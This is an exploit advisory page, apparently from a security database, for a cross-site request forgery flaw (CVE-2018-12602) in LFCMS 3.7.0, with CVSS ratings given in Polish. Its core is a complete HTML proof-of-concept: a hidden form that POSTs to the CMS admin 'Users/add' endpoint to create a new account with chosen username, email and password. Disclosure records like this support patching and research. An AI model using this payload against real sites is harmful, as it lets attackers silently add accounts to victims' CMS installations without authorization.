LFCMS 3.7.0 Cross Site Request Forgery

2018.06.22
Credit: bay0net
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily. # Date: 2018-06-20 # Exploit Author: bay0net # Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html # Software Link: http://www.lfdycms.com/home/down/index/id/26.html # Version: 3.7.0 # CVE : CVE-2018-12602 A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily. The payload for attack is as follows. <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST"> <input type="hidden" name="username" value="test222" /> <input type="hidden" name="email" value="test2@qq.com" /> <input type="hidden" name="password" value="test222" /> <input type="hidden" name="repassword" value="test222" /> <input type="submit" value="Submit request" /> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top